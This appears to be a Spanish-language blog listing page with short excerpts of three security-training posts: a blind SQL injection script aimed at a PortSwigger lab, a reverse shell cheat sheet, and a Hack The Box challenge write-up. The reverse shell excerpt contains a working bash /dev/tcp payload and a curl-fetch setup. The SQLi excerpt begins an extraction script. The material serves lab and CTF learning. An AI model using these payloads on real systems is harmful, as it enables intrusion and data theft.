Autor: Lund K. S.
-
SQL INJECION - SQLI CHEAT SHEET
SQL INJECTION SCRIPTS QUE SIRVEN DE GUIA PARA LOS DIFERENTES TIPOS DE SQLI DE TIPOS CONDITIONAL REPONSE sqli_base_response.py #!/usr/bin/python3 from pwn import * import requests,signal ,time,pdb,sys,string def def_handler(sig,frame): print("\n\n [!] Saliendo... \n") sys.exit(1) # ctrl + c signal.signal(signal.SIGINT,def_handler) main_url = "https://0a8d00e8034e08e980bcd096007a0046.web-security-academy.net/filter?category=Accessories" characters = string.ascii_lowercase + string.ascii_uppercase + string.digits # caracteres...
-
Revershell cheet sheat
Primeramente debes tener ejecucion remota de comandos, luego verificar si hay curl , lo haces con “ which curl” luedo de la maquina atacante te abres un servidor http y creas un index.html: #!/bin/bash bash -i >& /dev/tcp/10.10.10.10/443 0>&1 y te pones en escucha en la maquina atacante con: nc...
-
HTB-Morsarchive
Resolucion de challenges-Morsarchive *** Primeramente de dejo un zip el cual tiene todos los scritps y la contraseña es la flag. *** Scripts.zip. *** Ahora para que te pueda funcionar mi script debes de tener una estructura de archivos como: El ejercicio trata de archivos comprimidos redundandetemente 999 veces y...